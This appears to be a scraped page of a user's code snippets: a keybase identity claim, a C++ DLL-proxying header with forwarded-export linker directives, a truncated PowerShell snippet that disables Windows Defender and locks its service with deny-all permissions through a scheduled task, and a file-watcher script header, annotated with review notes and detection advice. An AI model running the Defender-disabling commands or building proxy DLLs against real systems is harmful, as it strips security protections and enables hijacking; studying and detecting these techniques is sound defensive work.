I hereby claim:
- I am p0shkatz on github.
- I am p0shkatz (https://keybase.io/p0shkatz) on keybase.
- I have a public key ASCktdQUYuSBTup_UWSLAihx_cZEuwIgYPrIjsEdl-QuHwo
To claim this, I am signing this object:
// Header and linker-directive preamble of a Windows DLL project.
// NOTE(review): only the top of the listing is visible on this page, and the trailing "| |"
// on each line is page-extraction residue, not source text.
#include "pch.h" | |
#include <windows.h> | |
#include <string> | |
#include <iostream> | |
// Each /export directive asks the MSVC linker to emit a forwarded export: FunctionNameN in this
// DLL resolves to the same-named export of the DLL named on the right-hand side (a placeholder
// path here). This is the export-forwarding ("DLL proxying") pattern: callers of the original
// exports keep working while this DLL's own code is loaded into the host process. What that
// code does is not shown in this preview.
// NOTE(review): the quadrupled backslashes may be an escaping artifact of the page - confirm
// against the original file.
// Defender's view: a DLL whose export table consists of forwarders to an absolute path or to a
// renamed copy of a vendor/system DLL, especially an unsigned one sitting in an application
// directory, is worth flagging; image-load telemetry with signature status (e.g. Sysmon
// Event ID 7) and export-table inspection are the usual places to look.
#pragma comment(linker, "/export:FunctionName1=C:\\\\path\\\\to\\\\legitDLL.FunctionName1") | |
#pragma comment(linker, "/export:FunctionName2=C:\\\\path\\\\to\\\\legitDLL.FunctionName2") | |
#pragma comment(linker, "/export:FunctionName3=C:\\\\path\\\\to\\\\legitDLL.FunctionName3") | |
#pragma comment(linker, "/export:FunctionName4=C:\\\\path\\\\to\\\\legitDLL.FunctionName4") | |
#pragma comment(linker, "/export:FunctionName5=C:\\\\path\\\\to\\\\legitDLL.FunctionName5") |
# Attributed by the page author to James Forshaw.
# NOTE(review): this is a truncated preview - the script continues past $svc.Connect() - and
# the trailing "| |" / "|" on each line is page-extraction residue, not PowerShell.
#
# What the visible lines do:
#   - $cmdline chains two sc.exe calls. "config windefend start= disabled" requests that the
#     WinDefend service start type be set to disabled; "sdset" requests that the service's
#     security descriptor be replaced with a DACL of two deny-GenericAll ACEs
#     (WD = Everyone, OW = Owner Rights).
#   - The command is wrapped in a cmd.exe action and registered as scheduled task 'TestTask'.
#   - A Schedule.Service COM object is created and connected; how the task is subsequently
#     run, and under which identity, is not visible here.
#
# Defender's view: alert on process command lines where sc.exe targets windefend with
# "config" or "sdset", on scheduled-task creation (Security event 4698 when object-access
# auditing is enabled), and on service start-type changes (System event 7040). Defender
# Tamper Protection is intended to resist this class of change - verify it is enabled and
# that its state is monitored.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() |
I hereby claim:
To claim this, I am signing this object:
# FileSystemWatcher.ps1
# NOTE(review): truncated preview - only the settings header is visible; the trailing "| |"
# on each line is page-extraction residue, not PowerShell.
# To stop the monitoring, run the following command:
#   Get-EventSubscriber | Unregister-Event
# Log settings: the log file is written to the current user's desktop.
$LogFilePath = "$env:userprofile\desktop\FileSystemWatcher.log" | |
# Execution settings
# NOTE(review): $patchexec starts as $false; its use lies outside this preview - presumably a
# switch gating an action taken on watched files. Confirm against the full script.
$patchexec = $false | |
# You will need to change this (the setting this refers to is cut off in the preview)
get-process;read-host \"Press enter\"; |